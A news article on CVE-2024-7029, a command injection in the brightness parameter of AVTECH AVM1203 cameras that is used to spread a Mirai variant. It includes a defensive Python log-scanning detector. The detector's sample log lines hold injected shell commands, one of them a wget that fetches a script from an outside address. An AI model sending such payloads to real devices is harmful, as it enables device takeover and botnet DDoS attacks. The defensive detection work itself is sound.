CVE-2024-7029: Hackers Target AVTECH Cameras with Mirai Malware
Akamai has detected a new wave of attacks targeting outdated surveillance cameras produced by the Taiwanese manufacturer AVTECH. The attackers are exploiting a critical vulnerability in the AVM1203 model to spread a variant of the Mirai botnet malware.
The vulnerability, tracked as CVE-2024-7029, allows remote execution of arbitrary commands on the device. Although the issue has been publicly known for nearly five years, it was officially recognized and assigned a CVE identifier only this month (August 2024). Akamai researchers have observed active exploitation since March of this year. The attacks were picked up by a network of honeypots that emulate vulnerable cameras exposed to the internet.
The Mirai botnet first made headlines in 2016 when it was used to launch a massive DDoS attack on the website of cybersecurity expert Brian Krebs. In the following weeks, it was deployed against internet service providers and other targets. One such attack on the DNS provider Dyn led to widespread disruptions across many popular web services.
The situation was further complicated when Mirai's creators released the malware's source code, enabling virtually anyone to build their own variants and conduct DDoS attacks of unprecedented scale. According to Kyle Lefton, a researcher from Akamai's Threat Response Team, they have observed DDoS attacks using infected cameras against "various organizations." However, there is no evidence yet that the attackers are using the cameras for espionage or video stream viewing.
The exploited vulnerability is a command injection: the brightness parameter of a request to /cgi-bin/supervisor/Factory.cgi is not sanitized before it reaches a shell, so commands embedded in it are executed by the device. In the observed attacks, the injected command downloads a JavaScript file onto the camera, which then fetches and executes the main payload, a Mirai variant known as Corona. Once the device is infected, the bot attempts to propagate further by connecting over Telnet to other hosts. It also exploits several other vulnerabilities, including an RCE in Hadoop YARN, CVE-2014-8361 (Realtek SDK miniigd UPnP) and CVE-2017-17215 (Huawei HG532 routers).
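As an added illustration (this is not Akamai's or AVTECH's code), the following Python detector scans web-server access logs for requests to /cgi-bin/supervisor/Factory.cgi whose brightness parameter contains shell metacharacters or anything other than a plain integer, and shows the input validation the CGI handler should have applied instead of splicing the value into a shell command. The log lines are constructed sample data, and the accepted brightness range 0-100 is an assumption; the real device range and the exact payload shape used in the campaign are not given in the article.

```python
"""Detect CVE-2024-7029-style command-injection attempts against
/cgi-bin/supervisor/Factory.cgi in access logs, and show the validation
the handler should have done. Added example; log lines are constructed."""
import re
from typing import Optional
from urllib.parse import unquote_plus, urlsplit

TARGET_PATH = "/cgi-bin/supervisor/Factory.cgi"

# Characters that let a parameter value escape a shell command string.
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")

# Combined-log-format style request line: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)

# Constructed sample lines (RFC 5737 test addresses); not captured traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2024:08:15:02 +0000] "GET /cgi-bin/supervisor/Factory.cgi?brightness=1;wget%20http://198.51.100.9/x.sh HTTP/1.1" 200 512',
    '198.51.100.23 - - [12/Mar/2024:08:16:10 +0000] "GET /cgi-bin/supervisor/Factory.cgi?brightness=60 HTTP/1.1" 200 512',
    '192.0.2.44 - - [12/Mar/2024:08:17:44 +0000] "GET /cgi-bin/supervisor/Factory.cgi?brightness=1%60id%60 HTTP/1.1" 200 512',
    '192.0.2.45 - - [12/Mar/2024:08:18:01 +0000] "GET /index.html HTTP/1.1" 200 1024',
]


def parse_query(query: str) -> dict:
    """Split a query string on '&' only, so a ';' inside a value is kept
    as payload rather than treated as a separator, then percent-decode."""
    params: dict = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def parse_log_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_query(parts.query)
    return rec


def is_injection_attempt(rec: Optional[dict]) -> bool:
    """True when the request targets Factory.cgi and any brightness value
    is not a plain integer (metacharacters or other non-numeric content)."""
    if rec is None or rec["path"] != TARGET_PATH:
        return False
    for value in rec["params"].get("brightness", []):
        if SHELL_META.search(value) or not value.strip().isdigit():
            return True
    return False


def flag_suspicious(lines) -> list:
    """Return the parsed records of lines that look like exploit attempts."""
    hits = []
    for line in lines:
        rec = parse_log_line(line)
        if is_injection_attempt(rec):
            hits.append(rec)
    return hits


def validate_brightness(raw: str) -> Optional[int]:
    """What the CGI handler should do: accept only a small integer in the
    device's range (0-100 assumed here) and pass it on as a number, never
    as a string inside a shell command. Returns None for rejected input."""
    if not re.fullmatch(r"\d{1,3}", raw):
        return None
    value = int(raw)
    return value if 0 <= value <= 100 else None


if __name__ == "__main__":
    for hit in flag_suspicious(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} brightness={hit['params']['brightness']}")
```

The decoder deliberately splits only on `&` because the injected command in an attack may itself contain `;`, and some query parsers treat `;` as a separator, which would silently drop the payload from the value being inspected. Percent-decoding before the check matters for the same reason: an encoded backtick or semicolon is still a shell metacharacter once the device decodes it.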
Since the vulnerable AVM1203 camera model is no longer supported by the manufacturer and will not receive a fix, experts strongly advise users to take it out of service entirely and replace it with a currently supported device; until that happens, such cameras should at least not be reachable from the internet. Specialists also once again emphasize the importance of changing default credentials on all internet-connected devices, since Mirai spreads over Telnet by trying factory-default logins.